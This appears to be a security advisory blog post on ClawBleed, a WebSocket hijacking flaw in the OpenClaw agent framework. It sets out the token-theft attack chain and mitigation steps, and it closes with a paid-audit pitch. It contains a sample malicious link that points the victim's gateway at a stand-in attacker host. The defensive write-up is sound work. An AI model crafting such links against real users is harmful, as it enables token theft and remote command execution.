In January 2026, security researcher Mav Levin disclosed CVE-2026-25253 โ a cross-site WebSocket hijacking vulnerability in OpenClaw and Clawdbot that allows any malicious website to steal your authentication token and run arbitrary commands on your machine. The community named it ClawBleed.
It's since been confirmed as actively exploited. Hudson Rock documented Vidar infostealer variants specifically targeting OpenClaw agent identities. If you're running an unpatched version, this is the most critical issue to fix today.
What ClawBleed Actually Does
The vulnerability stems from a single design flaw: OpenClaw's control UI reads a gatewayUrl parameter from the URL query string without validating its origin, and auto-connects to it on page load.
Here's the attack chain:
- Attacker crafts a URL pointing to their malicious WebSocket server:
https://attack.example.com/evil.html?gatewayUrl=ws://attacker.com - Victim clicks the link (or is redirected there by any means)
- OpenClaw's UI connects to the attacker's WebSocket server thinking it's the local gateway
- Attacker's server responds with a valid-looking auth challenge
- UI sends the authentication token to authenticate
- Attacker now has the token โ and with it, full API access to the victim's OpenClaw instance
- From there: arbitrary shell command execution, file reads, data exfiltration
The "even on localhost" problem: Many users assumed that binding OpenClaw to 127.0.0.1 would protect them. It doesn't. The attack happens through the browser, which has access to localhost. The malicious page runs in your browser, your browser has access to localhost, and the auth token is exfiltrated to a remote server before any local traffic is involved.
Are You Affected?
Check your version:
openclaw --version
- 2026.2.2 or later โ patched, not vulnerable to ClawBleed specifically
- Any version before 2026.2.2 โ vulnerable, update immediately
- Clawdbot users โ check the Clawdbot changelog separately; the patch timeline differs
Note: Even if you're patched for ClawBleed, CVE-2026-33579 (privilege escalation) and CVE-2026-32922 are separate issues that require separate patches. Staying current on all releases is the only complete mitigation.
Mitigation Steps
-
1
Update to 2026.2.2 or later
This is the primary fix. The patch validates the WebSocket origin against an allowlist and removes the auto-connect-from-querystring behavior.
npm install -g openclaw@latest openclaw --version # confirm 2026.2.2+
-
2
Set an explicit gateway bind address
Don't leave the gateway binding to the default. Force it to loopback only:
# In openclaw.json "gateway": { "bind": "127.0.0.1", "port": 3721 }Never use
0.0.0.0unless you understand exactly what network you're exposing to. -
3
Enable origin validation
In patched versions, you can explicitly configure the allowed origins for WebSocket connections:
"gateway": { "allowedOrigins": ["http://localhost:3721", "http://127.0.0.1:3721"] } -
4
Rotate your auth token
If you were running a pre-2026.2.2 version and clicked any suspicious links, assume your token is compromised. Regenerate it:
openclaw auth reset openclaw gateway restart
-
5
Check for unauthorized agent activity
Review your agent logs for any commands you didn't issue:
openclaw logs --since 7d | grep -i "exec\|shell\|command"
How It Relates to Other CVEs
OpenClaw has accumulated several CVEs in its first year. They're distinct issues โ don't assume patching one covers the others:
- CVE-2026-25253 (ClawBleed, CVSS 8.8) โ Cross-site WebSocket hijacking, RCE via token exfiltration. Patched in 2026.2.2.
- CVE-2026-32922 (CVSS critical) โ Privilege escalation affecting cloud/containerized deployments. Separate patch required.
- CVE-2026-33579 โ Privilege escalation via local exploit path. See our full guide.
If you're managing an OpenClaw setup for clients or running it on shared infrastructure, the OpenClawCVEs GitHub tracker maintained by @jgamblin is the best single source for staying current on all disclosed vulnerabilities.
Security posture summary: Update to the latest version. Bind to 127.0.0.1. Set allowed origins. Rotate tokens if you were exposed. Don't click random OpenClaw-related links from unknown sources. Run openclaw doctor after any update to confirm nothing regressed.
Why This Keeps Happening
ClawBleed isn't a freak accident โ it's the predictable result of shipping a powerful local agent framework at speed without a mature security review process. The gatewayUrl-from-querystring pattern is a textbook WebSocket hijacking setup that any security review would have flagged.
OpenClaw's security posture is improving โ the team now publishes CVE advisories, maintains a security policy, and ships patches faster. But with 135,000+ exposed instances discovered by researchers in early 2026 and active exploitation confirmed, the risk is real and current.
If you're running OpenClaw for business use โ especially with access to sensitive files, email, or financial tools โ the security configuration deserves serious attention. This is a large part of what our $49 audit covers.